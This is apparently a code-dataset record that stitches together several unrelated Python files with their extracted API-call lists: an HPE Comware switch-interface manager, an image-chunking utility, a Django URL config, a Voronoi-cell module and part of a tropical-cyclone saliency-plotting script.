] | [((410, 443), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (426, 443), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((468, 503), 'nivo_api.cli.bra_record_helper.persist.persist_zone', 'persist_zone', (['con', '"""this_is_a_test"""'], {}), "(con, 'this_is_a_test')\n", (480, 503), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((600, 633), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (616, 633), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((991, 1024), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (1007, 1024), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((1049, 1143), 'nivo_api.cli.bra_record_helper.persist.persist_massif', 'persist_massif', (['con', '"""CHABLAIS"""', "{'name': 'Haute-savoie', 'number': '74'}", '"""Alpes du Nord"""'], {}), "(con, 'CHABLAIS', {'name': 'Haute-savoie', 'number': '74'},\n 'Alpes du Nord')\n", (1063, 1143), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((1315, 1348), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (1331, 1348), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((1374, 1468), 'nivo_api.cli.bra_record_helper.persist.persist_massif', 'persist_massif', (['con', '"""CHABLAIS"""', "{'name': 'Haute-savoie', 'number': '74'}", '"""Alpes du Nord"""'], {}), "(con, 'CHABLAIS', {'name': 'Haute-savoie', 'number': '74'},\n 'Alpes du Nord')\n", (1388, 1468), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((1561, 1657), 'nivo_api.cli.bra_record_helper.persist.persist_massif', 'persist_massif', (['con', '"""MONT-BLANC"""', "{'name': 'Haute-savoie', 'number': '74'}", '"""Alpes du Nord"""'], {}), "(con, 'MONT-BLANC', {'name': 'Haute-savoie', 'number': '74'},\n 'Alpes du Nord')\n", (1575, 1657), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((737, 772), 'nivo_api.cli.bra_record_helper.persist.persist_zone', 'persist_zone', (['con', '"""this_is_a_test"""'], {}), "(con, 'this_is_a_test')\n", (749, 772), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((2025, 2044), 'sqlalchemy.bindparam', 'bindparam', (['"""massif"""'], {}), "('massif')\n", (2034, 2044), False, 'from sqlalchemy import select, bindparam\n'), ((1849, 1899), 'sqlalchemy.select', 'select', (['[ZoneTable.c.z_id, DepartmentTable.c.d_id]'], {}), '([ZoneTable.c.z_id, DepartmentTable.c.d_id])\n', (1855, 1899), False, 'from sqlalchemy import select, bindparam\n'), ((1929, 1960), 'nivo_api.core.db.models.sql.bra.ZoneTable.join', 'ZoneTable.join', (['DepartmentTable'], {}), '(DepartmentTable)\n', (1943, 1960), False, 'from nivo_api.core.db.models.sql.bra import ZoneTable, DepartmentTable, MassifTable\n')] |
import itertools
import numpy as np
from jspp_imageutils.image.types import GenImgArray, GenImgBatch
from typing import Tuple, Iterable, Iterator
# TODO: fix everywhere the x and y axis nomenclature
"""
chunk_image_on_position -> returns images
chunk_image_generator -> returns images
chunk_data_image_generator -> returns batches of data
"""
def chunk_image_on_position(arr_img: GenImgArray,
x_pos: Iterable[int], y_pos: Iterable[int],
dimensions: Tuple[int, int] = (50, 50),
warn_leftovers=True) -> \
Iterator[Tuple[int, int, GenImgArray]]:
# TODO decide if this should handle centering the points ...
x_ends = [x + dimensions[0] for x in x_pos]
y_ends = [y + dimensions[1] for y in y_pos]
i = 0
# TODO find a better way to indent this ...
for y_start, y_end, x_start, x_end in \
zip(y_pos, y_ends, x_pos, x_ends):
temp_arr_img = arr_img[x_start:x_end, y_start:y_end, ]
if temp_arr_img.shape[0:2] == dimensions:
yield x_start, y_start, temp_arr_img
i += 1
else:
if warn_leftovers:
print("skipping chunk due to weird size",
str(temp_arr_img.shape))
print("Image generator yielded ", str(i), " images")
def chunk_image_generator(img,
chunk_size: Tuple[int, int] = (500, 500),
displacement: Tuple[int, int] = (250, 250),
warn_leftovers=True) -> \
Iterator[Tuple[int, int, GenImgArray]]:
"""
Gets an image read with tensorflow.keras.preprocessing.image.load_img
and returns a generator that iterates over rectangular areas of it.
chunks are of dims (chunk_size, colors)
"""
# TODO unify the input for this guy ...
arr_img = np.asarray(img)
dims = arr_img.shape
x_starts = [
displacement[0] * x for x in range(dims[0] // displacement[0])
]
x_starts = [x for x in x_starts if
x >= 0 & (x + chunk_size[0]) < dims[0]]
y_starts = [
displacement[1] * y for y in range(dims[1] // displacement[1])
]
y_starts = [y for y in y_starts if
y >= 0 & (y + chunk_size[1]) < dims[1]]
coord_pairs = itertools.product(x_starts, y_starts)
coord_pairs = np.array(list(coord_pairs))
my_gen = chunk_image_on_position(
arr_img, coord_pairs[:, 0], coord_pairs[:, 1],
dimensions=chunk_size, warn_leftovers=warn_leftovers)
for chunk in my_gen:
yield(chunk)
def chunk_data_image_generator(img: GenImgArray,
chunk_size: Tuple[int, int] = (500, 500),
displacement: Tuple[int, int] = (250, 250),
batch: int = 16) -> GenImgBatch:
"""
chunk_data_image_generator [summary]
Gets an image read with tensorflow.keras.preprocessing.image.load_img
and returns a generator that iterates over BATCHES of rectangular
areas of it
dimensions are (batch, chunk_size, colors)
:param img: [description]
:type img: GenImgArray
:param chunk_size: [description], defaults to (500, 500)
:type chunk_size: Tuple[int, int], optional
:param displacement: [description], defaults to (250, 250)
:type displacement: Tuple[int, int], optional
:param batch: [description], defaults to 16
:type batch: int, optional
:return: [description]
:rtype: GenImgBatch
"""
# np.concatenate((a1, a2))
img_generator = chunk_image_generator(
img=img, chunk_size=chunk_size,
displacement=displacement)
counter = 0
img_buffer = []
for _, _, temp_arr_img in img_generator:
tmp_arr_dims = temp_arr_img.shape
temp_arr_img = temp_arr_img.reshape(1, *tmp_arr_dims)
img_buffer.append(temp_arr_img)
counter += 1
if counter == batch:
yield(np.concatenate(img_buffer))
counter = 0
img_buffer = []
yield(np.concatenate(img_buffer))
| [
"itertools.product",
"numpy.asarray",
"numpy.concatenate"
] | [((1915, 1930), 'numpy.asarray', 'np.asarray', (['img'], {}), '(img)\n', (1925, 1930), True, 'import numpy as np\n'), ((2354, 2391), 'itertools.product', 'itertools.product', (['x_starts', 'y_starts'], {}), '(x_starts, y_starts)\n', (2371, 2391), False, 'import itertools\n'), ((4118, 4144), 'numpy.concatenate', 'np.concatenate', (['img_buffer'], {}), '(img_buffer)\n', (4132, 4144), True, 'import numpy as np\n'), ((4026, 4052), 'numpy.concatenate', 'np.concatenate', (['img_buffer'], {}), '(img_buffer)\n', (4040, 4052), True, 'import numpy as np\n')] |
"""Manage interfaces on HPCOM7 devices.
"""
from pyhpecw7.utils.xml.lib import reverse_value_map
from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError,\
InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist
from pyhpecw7.features.vlan import Vlan
from pyhpecw7.utils.xml.lib import *
class Interface(object):
"""This class is used to get
and build interface configurations on ``HPCOM7`` devices.
Args:
device (HPCOM7): connected instance of a
``phyp.comware.HPCOM7`` object.
interface_name (str): The name of the interface.
Attributes:
device (HPCOM7): connected instance of a
``phyp.comware.HPCOM7`` object.
interface_name (str): The name of the interface.
iface_index (str): The device's internal number representation
of an interface.
iface_type (str): The type of interface,
for example: 'LoopBack', 'FortyGigE'.
is_ethernet (bool): Whether the interface is ethernet.
is_routed (bool): Whether the interface is in layer 3 mode.
If this is ``False``, the interface is either in bridged
mode or does not exist.
iface_exists (bool): Whether the interface exists. Physical
interfaces should always exist. Logical interfaces may
or may not exist.
"""
def __init__(self, device, interface_name):
# used to map key values from our dictionary model
# to expected XML tags and vice versa
self._key_map = {
'admin': 'AdminStatus',
'speed': 'ConfigSpeed',
'duplex': 'ConfigDuplex',
'description': 'Description',
'type': 'PortLayer'
}
# used to map value values from our dictionary model
# to expected XML tags and vice versa
self._value_map = {
'AdminStatus': {'1': 'up',
'2': 'down'},
'ConfigSpeed': {'1': 'auto', '2': '10',
'4': '100', '32': '1000',
'1024': '10000', '4096': '20000',
'8192': '40000', '16384': '100000'},
'ConfigDuplex': {'1': 'full',
'2': 'half',
'3': 'auto'},
'PortLayer': {'1': 'bridged',
'2': 'routed'}
}
self._iface_types = set(['FortyGigE', 'Tunnel', 'LoopBack',
'Vlan-interface', 'Bridge-Aggregation',
'Route-Aggregation', 'GigabitEthernet',
'Ten-GigabitEthernet'])
# xml tags
self._iface_row_name = 'Interface'
self._iface_index_name = 'IfIndex'
# usd in conjunction with key map and value map above
self._r_key_map = dict(reversed(item) for item in self._key_map.iteritems())
self._r_value_map = reverse_value_map(self._r_key_map, self._value_map)
# connect to the device and get more information
self.interface_name, self.iface_type = self._iface_type(interface_name)
self.device = device
# The interface index is needed for most interface NETCONF requests
self.iface_index = self._get_iface_index()
self.is_ethernet, self.is_routed = self._is_ethernet_is_routed()
self.iface_exists = True if self.iface_index else False
def _iface_type(self, if_name):
"""Return the normalized interface name and type
from a denormalized interface name.
"""
if if_name.lower().startswith('gi'):
if_type = 'GigabitEthernet'
elif if_name.lower().startswith('ten'):
if_type = 'Ten-GigabitEthernet'
elif if_name.lower().startswith('fo'):
if_type = 'FortyGigE'
elif if_name.lower().startswith('vl'):
if_type = 'Vlan-interface'
elif if_name.lower().startswith('lo'):
if_type = 'LoopBack'
elif if_name.lower().startswith('br'):
if_type = 'Bridge-Aggregation'
elif if_name.lower().startswith('ro'):
if_type = 'Route-Aggregation'
elif if_name.lower().startswith('tu'):
if_type = 'Tunnel'
else:
if_type = None
number_list = if_name.split(' ')
if len(number_list) == 2:
number = number_list[-1].strip()
else:
number = self._get_number(if_name)
if if_type:
proper_interface = if_type + number
else:
proper_interface = if_name
return proper_interface, if_type
def _get_number(self, if_name):
digits = ''
for char in if_name:
if char.isdigit() or char == '/':
digits += char
return digits
def _get_iface_index(self):
"""Return the interface index given the self.interface_name
attribute by asking the device. If the interface doesn't exist,
return the empty string.
"""
E = data_element_maker()
top = E.top(
E.Ifmgr(
E.Interfaces(
E.Interface(
E.Name(self.interface_name)
)
)
)
)
nc_get_reply = self.device.get(('subtree', top))
reply_data = find_in_data(
self._iface_index_name, nc_get_reply.data_ele)
if reply_data is None:
return ''
return reply_data.text
def _is_ethernet_is_routed(self):
"""Return whether the interface is ethernet and whether
it is routed. If the interface doesn't exist,
return False.
"""
E = data_element_maker()
top = E.top(
E.Ifmgr(
E.Interfaces(
E.Interface(
E.IfIndex(self.iface_index)
)
)
)
)
nc_get_reply = self.device.get(('subtree', top))
reply_data = find_in_data('ifType', nc_get_reply.data_ele)
routed_reply_data = find_in_data('PortLayer', nc_get_reply.data_ele)
is_ethernet = False
is_routed = False
try:
if reply_data.text == '6':
is_ethernet = True
except AttributeError:
pass
try:
if routed_reply_data.text == '2':
is_routed = True
except AttributeError:
pass
return is_ethernet, is_routed
def update(self):
"""Update ``self.iface_index`` and ``self.iface_exists``.
Usually called after a logical interface is created.
Raises:
InterfaceCreateError: if the interface hasn't yet
been successfully created.
Note:
It is the responsibility of the caller to call ``update()`
after staging (``create_logical()``) *and* executing
(``execute()`` on this class's ``device`` object) of
commands to create an interface.
"""
if_index = self._get_iface_index()
if not if_index:
raise InterfaceCreateError(self.interface_name)
self.iface_index = if_index
self.iface_exists = True
def get_default_config(self):
"""Return the default configuration of an interface.
Returns:
A dictionary of default interface configuration parameters,
depending on the type of interface.
For example, for ethernet interfaces::
{
'description': 'FortyGigE1/0/1 Interface',
'admin': 'up',
'speed': 'auto',
'duplex': 'auto',
'type': 'bridged'
}
"""
if not self.iface_type:
return None
defaults = {}
defaults['description'] = self.interface_name + ' Interface'
defaults['admin'] = 'up'
if self.is_ethernet:
defaults['speed'] = 'auto'
defaults['duplex'] = 'auto'
defaults['type'] = 'bridged'
elif self.iface_type == 'Bridge-Aggregation':
defaults['type'] = 'bridged'
else:
defaults['type'] = 'routed'
return defaults
def param_check(self, **params):
"""Checks given parameters against the interface for various errors.
Args:
**params: see Keyword Args
Keyword Args:
admin (str): The up/down state of the interface.
'up' or 'down'.
speed (str): The speed of the interface, in Mbps.
duplex (str): The duplex of the interface.
'full', 'half', or 'auto'.
description (str): The textual description of the interface.
type (str): Whether the interface is in layer 2 or layer 3 mode.
'bridged' or 'routed'.
Raises:
InterfaceTypeError: if the given interface isn't a valid type.
InterfaceAbsentError: if the given interface is of type is_ethernet
and doesn't exist.
InterfaceParamsError: if 'speed' or 'duplex' are supplied for a
non ethernet interface.
InterfaceVlanMustExist: if the interface is of type
'Vlan-interface' and the the associated vlan doesn't exist.
"""
if not self.iface_type:
raise InterfaceTypeError(
self.interface_name, list(self._iface_types))
if not self.iface_exists:
if self.iface_type in {'FortyGigE', 'GigabitEthernet',
'Ten-GigabitEthernet'}:
raise InterfaceAbsentError(self.interface_name)
if not self.is_ethernet:
param_names = []
if params.get('speed'):
param_names.append('speed')
if params.get('duplex'):
param_names.append('duplex')
if param_names:
raise InterfaceParamsError(self.interface_name, param_names)
if self.iface_type == 'Vlan-interface':
number = self.interface_name.split('Vlan-interface')[1]
vlan = Vlan(self.device, number)
if not vlan.get_config():
raise InterfaceVlanMustExist(self.interface_name, number)
def get_config(self):
"""Return the currently configured
parameters for the interface.
Returns:
A dictionary of currently configured
parameters for the interface, including:
:admin (str): The up/down state of the interface.
'up' or 'down'.
:speed (str): The speed of the interface, in Mbps.
:duplex (str): The duplex of the interface.
'full', 'half', or 'auto'.
:description (str): The textual description of the interface.
:type (str): Whether the interface is in layer 2 or
layer 3 mode. 'bridged' or 'routed'.
"""
E = data_element_maker()
top = E.top(
E.Ifmgr(
E.Interfaces(
E.Interface(
E.IfIndex(self.iface_index)
)
)
)
)
nc_get_reply = self.device.get(('subtree', top))
reply_data = find_in_data(self._iface_row_name, nc_get_reply.data_ele)
if reply_data is None:
return {}
return data_elem_to_dict(reply_data, self._key_map, value_map=self._value_map)
def create_logical(self, stage=False):
"""Stage or execute the configuration to create
a logical interface.
Supported types include 'LoopBack',
'Vlan-interface', 'Bridge-Aggregation',
and 'Route-Aggregation'
Note:
When stage=True, it's the caller's responsibility to call
``execute()`` on this class's ``device``
object after this method is called.
Note:
After execution, the caller must call ``update()`` on this class.
Returns:
True if successful.
Raises:
InterfaceCreateError: if the logical interface
cannot be created.
"""
return self._logical_iface(stage=stage)
def remove_logical(self, stage=False):
"""Stage or execute the configuration to remove
a logical interface.
Supported types include 'LoopBack',
'Vlan-interface', 'Bridge-Aggregation',
and 'Route-Aggregation'
Args:
stage (bool): whether to stage the commands or execute
immediately
Note:
It's the caller's responsibility to call
``execute()`` on this class's ``device``
object after this method is called.
Returns:
True if stage=True and staging is successful
etree.Element XML response if immediate execution
Raises:
InterfaceCreateError: if the logical interface
cannot be removed.
"""
return self._logical_iface(remove=True, stage=stage)
def _logical_iface(self, remove=False, stage=False):
"""Stage or execute the configuration to create
or remove a logical interface.
Args:
remove (bool): If ``True``, the logical
interface is removed. If ``False``,
the logical interface is created.
stage (bool): whether to stage the commands or execute
immediately
Returns:
True if stage=True and staging is successful
etree.Element XML response if immediate execution
"""
logic_type_map = {'LoopBack': '16',
'Vlan-interface': '41',
'Bridge-Aggregation': '56',
'Route-Aggregation': '67'}
if self.iface_type not in logic_type_map:
raise InterfaceCreateError(self.interface_name)
iface_number = self.interface_name.split(self.iface_type)[1]
E = action_element_maker()
top = E.top(
E.Ifmgr(
E.LogicInterfaces(
E.Interface(
E.IfTypeExt(logic_type_map[self.iface_type]),
E.Number(iface_number)
)
)
)
)
if remove:
find_in_action('Interface', top).append(E.Remove())
if stage:
return self.device.stage_config(top, 'action')
else:
return self.device.action(top)
def build(self, stage=False, **params):
"""Stage or execute the configuration to
modify an interface.
Args:
stage (bool): whether to stage the commands or execute
immediately
**params: see Keyword Args.
Keyword Args:
admin (str): The up/down state of the interface.
'up' or 'down'.
speed (str): The speed of the interface, in Mbps.
duplex (str): The duplex of the interface.
'full', 'half', or 'auto'.
description (str): The textual description of the interface.
type (str): Whether the interface is in layer 2 or layer 3 mode.
'bridged' or 'routed'.
Raises:
InterfaceCreateError: if a logical interface cannot be created.
Returns:
True if stage=True and staging is successful
etree.Element XML response if immediate execution
"""
return self._build_config(state='present', stage=stage, **params)
def default(self, stage=False):
"""Stage or execute the configuration to default an interface.
stage (bool): whether to stage the commands or execute
immediately
Returns:
True if stage=True and staging is successful
etree.Element XML response if immediate execution
"""
return self._build_config(state='default', stage=stage)
def _build_config(self, state, stage=False, **params):
"""Stage or execute the configuration to
configure, default, or remove an interface.
Args:
state (str): 'present' configures,
'absent' defaults,
'default' defaults.
stage (bool): whether to stage the commands or execute
immediately
**params: Used when state=present, see Keyword Args.
Keyword Args:
admin (str): The up/down state of the interface.
'up' or 'down'.
speed (str): The speed of the interface, in Mbps.
duplex (str): The duplex of the interface.
'full', 'half', or 'auto'.
description (str): The textual description of the interface.
type (str): Whether the interface is in layer 2 or layer 3 mode.
'bridged' or 'routed'.
Returns:
True if stage=True and staging is successful
etree.Element XML response if immediate execution
False if illegal operation, e.g. removing a physical interface
"""
if state == 'default':
if self.iface_exists:
E = action_element_maker()
top = E.top(
E.Ifmgr(
E.Interfaces(
E.Interface(
E.IfIndex(self.iface_index),
E.Default()
)
)
)
)
if stage:
return self.device.stage_config(top, 'action')
else:
return self.device.action(top)
if state == 'present':
params[self._iface_index_name] = self.iface_index
EN = nc_element_maker()
EC = config_element_maker()
config = EN.config(
EC.top(
EC.Ifmgr(
EC.Interfaces(
EC.Interface(
*config_params(params, self._key_map, value_map=self._r_value_map)
)
)
)
)
)
if stage:
return self.device.stage_config(config, 'edit_config')
else:
return self.device.edit_config(config)
if state == 'absent':
if self.is_ethernet:
return self._build_config('default', stage=stage)
return False
| [
"pyhpecw7.utils.xml.lib.reverse_value_map",
"pyhpecw7.features.errors.InterfaceParamsError",
"pyhpecw7.features.errors.InterfaceVlanMustExist",
"pyhpecw7.features.errors.InterfaceCreateError",
"pyhpecw7.features.errors.InterfaceAbsentError",
"pyhpecw7.features.vlan.Vlan"
] | [((2982, 3033), 'pyhpecw7.utils.xml.lib.reverse_value_map', 'reverse_value_map', (['self._r_key_map', 'self._value_map'], {}), '(self._r_key_map, self._value_map)\n', (2999, 3033), False, 'from pyhpecw7.utils.xml.lib import reverse_value_map\n'), ((7232, 7273), 'pyhpecw7.features.errors.InterfaceCreateError', 'InterfaceCreateError', (['self.interface_name'], {}), '(self.interface_name)\n', (7252, 7273), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((10325, 10350), 'pyhpecw7.features.vlan.Vlan', 'Vlan', (['self.device', 'number'], {}), '(self.device, number)\n', (10329, 10350), False, 'from pyhpecw7.features.vlan import Vlan\n'), ((14160, 14201), 'pyhpecw7.features.errors.InterfaceCreateError', 'InterfaceCreateError', (['self.interface_name'], {}), '(self.interface_name)\n', (14180, 14201), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((9817, 9858), 'pyhpecw7.features.errors.InterfaceAbsentError', 'InterfaceAbsentError', (['self.interface_name'], {}), '(self.interface_name)\n', (9837, 9858), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((10134, 10188), 'pyhpecw7.features.errors.InterfaceParamsError', 'InterfaceParamsError', (['self.interface_name', 'param_names'], {}), '(self.interface_name, param_names)\n', (10154, 10188), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n'), ((10411, 10462), 'pyhpecw7.features.errors.InterfaceVlanMustExist', 'InterfaceVlanMustExist', (['self.interface_name', 'number'], {}), '(self.interface_name, number)\n', (10433, 10462), False, 'from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError, InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist\n')] |
from django.contrib import admin
from django.urls import path, include
from src.base import urls as base_api
urlpatterns = [
path('admin/', admin.site.urls),
path('rest_api/', include(
base_api.urlpatterns
)),
] | [
"django.urls.path",
"django.urls.include"
] | [((131, 162), 'django.urls.path', 'path', (['"""admin/"""', 'admin.site.urls'], {}), "('admin/', admin.site.urls)\n", (135, 162), False, 'from django.urls import path, include\n'), ((186, 215), 'django.urls.include', 'include', (['base_api.urlpatterns'], {}), '(base_api.urlpatterns)\n', (193, 215), False, 'from django.urls import path, include\n')] |
"""Compute ordinary Voronoi diagrams in Shapely geometries."""
import operator
import numpy
import scipy.spatial
import shapely.geometry
import shapely.geometry.base
import shapely.prepared
def pointset_bounds(coords):
return (
min(coords, key=operator.itemgetter(0))[0],
min(coords, key=operator.itemgetter(1))[1],
max(coords, key=operator.itemgetter(0))[0],
max(coords, key=operator.itemgetter(1))[1],
)
def bounds_to_limiting_generators(minx, miny, maxx, maxy):
addx = maxx - minx
addy = maxy - miny
return [
(minx - addx, miny - addy),
(maxx + addx, miny - addy),
(minx - addx, maxy + addy),
(maxx + addx, maxy + addy),
]
def cells(points, extent=None):
if extent is None:
bbox = pointset_bounds(points)
extent_prep = None
else:
if not isinstance(extent, shapely.geometry.base.BaseGeometry):
extent = shapely.geometry.box(*extent)
bbox = extent.bounds
extent_prep = shapely.prepared.prep(extent)
boundgens = bounds_to_limiting_generators(*bbox)
diagram = scipy.spatial.Voronoi(numpy.concatenate((points, boundgens)))
for reg_i in diagram.point_region[:-len(boundgens)]:
coords = diagram.vertices[diagram.regions[reg_i]]
poly = shapely.geometry.Polygon(coords)
if extent_prep is None or extent_prep.contains(poly):
yield poly
else:
yield extent.intersection(poly)
def cells_shapely(points, extent=None):
return cells(numpy.array([pt.coords[0] for pt in points]), extent=extent) | [
"numpy.array",
"operator.itemgetter",
"numpy.concatenate"
] | [((1145, 1183), 'numpy.concatenate', 'numpy.concatenate', (['(points, boundgens)'], {}), '((points, boundgens))\n', (1162, 1183), False, 'import numpy\n'), ((1550, 1594), 'numpy.array', 'numpy.array', (['[pt.coords[0] for pt in points]'], {}), '([pt.coords[0] for pt in points])\n', (1561, 1594), False, 'import numpy\n'), ((260, 282), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (279, 282), False, 'import operator\n'), ((312, 334), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (331, 334), False, 'import operator\n'), ((364, 386), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (383, 386), False, 'import operator\n'), ((416, 438), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (435, 438), False, 'import operator\n')] |
"""Plots composite saliency map."""
import argparse
import numpy
import matplotlib
matplotlib.use('agg')
from matplotlib import pyplot
from gewittergefahr.gg_utils import general_utils as gg_general_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.plotting import imagemagick_utils
from ml4tc.utils import normalization
from ml4tc.machine_learning import saliency
from ml4tc.machine_learning import neural_net
from ml4tc.plotting import plotting_utils
from ml4tc.plotting import satellite_plotting
from ml4tc.plotting import predictor_plotting
MAX_COLOUR_PERCENTILE = 99.
SHIPS_BUILTIN_LAG_TIMES_HOURS = numpy.array([numpy.nan, 0, 1.5, 3])
COLOUR_BAR_FONT_SIZE = 12
SCALAR_SATELLITE_FONT_SIZE = 20
LAGGED_SHIPS_FONT_SIZE = 20
FORECAST_SHIPS_FONT_SIZE = 10
FIGURE_RESOLUTION_DPI = 300
PANEL_SIZE_PX = int(2.5e6)
SALIENCY_FILE_ARG_NAME = 'input_saliency_file_name'
NORMALIZATION_FILE_ARG_NAME = 'input_normalization_file_name'
PLOT_INPUT_GRAD_ARG_NAME = 'plot_input_times_grad'
SPATIAL_COLOUR_MAP_ARG_NAME = 'spatial_colour_map_name'
NONSPATIAL_COLOUR_MAP_ARG_NAME = 'nonspatial_colour_map_name'
SMOOTHING_RADIUS_ARG_NAME = 'smoothing_radius_px'
OUTPUT_DIR_ARG_NAME = 'output_dir_name'
SALIENCY_FILE_HELP_STRING = (
'Path to saliency file. Will be read by `saliency.read_composite_file`.'
)
NORMALIZATION_FILE_HELP_STRING = (
'Path to file with normalization params (will be used to denormalize '
'brightness-temperature maps before plotting). Will be read by '
'`normalization.read_file`.'
)
PLOT_INPUT_GRAD_HELP_STRING = (
'Boolean flag. If 1 (0), will plot input * gradient (saliency).'
)
SPATIAL_COLOUR_MAP_HELP_STRING = (
'Name of colour scheme for spatial saliency maps. Must be accepted by '
'`matplotlib.pyplot.get_cmap`.'
)
NONSPATIAL_COLOUR_MAP_HELP_STRING = (
'Name of colour scheme for non-spatial saliency maps. Must be accepted by '
'`matplotlib.pyplot.get_cmap`.'
)
SMOOTHING_RADIUS_HELP_STRING = (
'Smoothing radius (number of pixels) for saliency maps. If you do not want'
' to smooth, make this 0 or negative.'
)
OUTPUT_DIR_HELP_STRING = 'Name of output directory. Images will be saved here.'
INPUT_ARG_PARSER = argparse.ArgumentParser()
INPUT_ARG_PARSER.add_argument(
'--' + SALIENCY_FILE_ARG_NAME, type=str, required=True,
help=SALIENCY_FILE_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + NORMALIZATION_FILE_ARG_NAME, type=str, required=True,
help=NORMALIZATION_FILE_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + PLOT_INPUT_GRAD_ARG_NAME, type=int, required=True,
help=PLOT_INPUT_GRAD_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + SPATIAL_COLOUR_MAP_ARG_NAME, type=str, required=False,
default='BuGn', help=SPATIAL_COLOUR_MAP_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + NONSPATIAL_COLOUR_MAP_ARG_NAME, type=str, required=False,
default='binary', help=NONSPATIAL_COLOUR_MAP_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + SMOOTHING_RADIUS_ARG_NAME, type=float, required=False, default=-1,
help=SMOOTHING_RADIUS_HELP_STRING
)
INPUT_ARG_PARSER.add_argument(
'--' + OUTPUT_DIR_ARG_NAME, type=str, required=True,
help=OUTPUT_DIR_HELP_STRING
)
def _plot_brightness_temp_saliency(
saliency_dict, model_metadata_dict, normalization_table_xarray,
colour_map_object, plot_input_times_grad, output_dir_name):
"""Plots saliency for brightness temp for each lag time at one init time.
:param saliency_dict: See doc for `_plot_scalar_satellite_saliency`.
:param model_metadata_dict: Same.
:param normalization_table_xarray: xarray table returned by
`normalization.read_file`.
:param colour_map_object: See doc for `_plot_scalar_satellite_saliency`.
:param plot_input_times_grad: Same.
:param output_dir_name: Same.
"""
predictor_matrices = [
None if p is None else numpy.expand_dims(p, axis=0)
for p in saliency_dict[saliency.THREE_PREDICTORS_KEY]
]
if plot_input_times_grad:
this_key = saliency.THREE_INPUT_GRAD_KEY
else:
this_key = saliency.THREE_SALIENCY_KEY
saliency_matrices = [
None if p is None else numpy.expand_dims(p, axis=0)
for p in saliency_dict[this_key]
]
num_lag_times = predictor_matrices[0].shape[3]
grid_latitudes_deg_n = numpy.linspace(
-10, 10, num=predictor_matrices[0].shape[1], dtype=float
)
grid_latitude_matrix_deg_n = numpy.expand_dims(grid_latitudes_deg_n, axis=1)
grid_latitude_matrix_deg_n = numpy.repeat(
grid_latitude_matrix_deg_n, axis=1, repeats=num_lag_times
)
grid_longitudes_deg_e = numpy.linspace(
300, 320, num=predictor_matrices[0].shape[2], dtype=float
)
grid_longitude_matrix_deg_e = numpy.expand_dims(
grid_longitudes_deg_e, axis=1
)
grid_longitude_matrix_deg_e = numpy.repeat(
grid_longitude_matrix_deg_e, axis=1, repeats=num_lag_times
)
figure_objects, axes_objects, pathless_output_file_names = (
predictor_plotting.plot_brightness_temp_one_example(
predictor_matrices_one_example=predictor_matrices,
model_metadata_dict=model_metadata_dict,
cyclone_id_string='2005AL12', init_time_unix_sec=0,
grid_latitude_matrix_deg_n=grid_latitude_matrix_deg_n,
grid_longitude_matrix_deg_e=grid_longitude_matrix_deg_e,
normalization_table_xarray=normalization_table_xarray,
border_latitudes_deg_n=numpy.array([20.]),
border_longitudes_deg_e=numpy.array([330.])
)
)
validation_option_dict = (
model_metadata_dict[neural_net.VALIDATION_OPTIONS_KEY]
)
num_model_lag_times = len(
validation_option_dict[neural_net.SATELLITE_LAG_TIMES_KEY]
)
all_saliency_values = numpy.concatenate([
numpy.ravel(s) for s in saliency_matrices if s is not None
])
min_abs_contour_value = numpy.percentile(
numpy.absolute(all_saliency_values), 100. - MAX_COLOUR_PERCENTILE
)
max_abs_contour_value = numpy.percentile(
numpy.absolute(all_saliency_values), MAX_COLOUR_PERCENTILE
)
panel_file_names = [''] * num_model_lag_times
for k in range(num_model_lag_times):
min_abs_contour_value, max_abs_contour_value = (
satellite_plotting.plot_saliency(
saliency_matrix=saliency_matrices[0][0, ..., k, 0],
axes_object=axes_objects[k],
latitude_array_deg_n=grid_latitude_matrix_deg_n[:, k],
longitude_array_deg_e=grid_longitude_matrix_deg_e[:, k],
min_abs_contour_value=min_abs_contour_value,
max_abs_contour_value=max_abs_contour_value,
half_num_contours=10,
colour_map_object=colour_map_object
)
)
panel_file_names[k] = '{0:s}/{1:s}'.format(
output_dir_name, pathless_output_file_names[k]
)
print('Saving figure to file: "{0:s}"...'.format(
panel_file_names[k]
))
figure_objects[k].savefig(
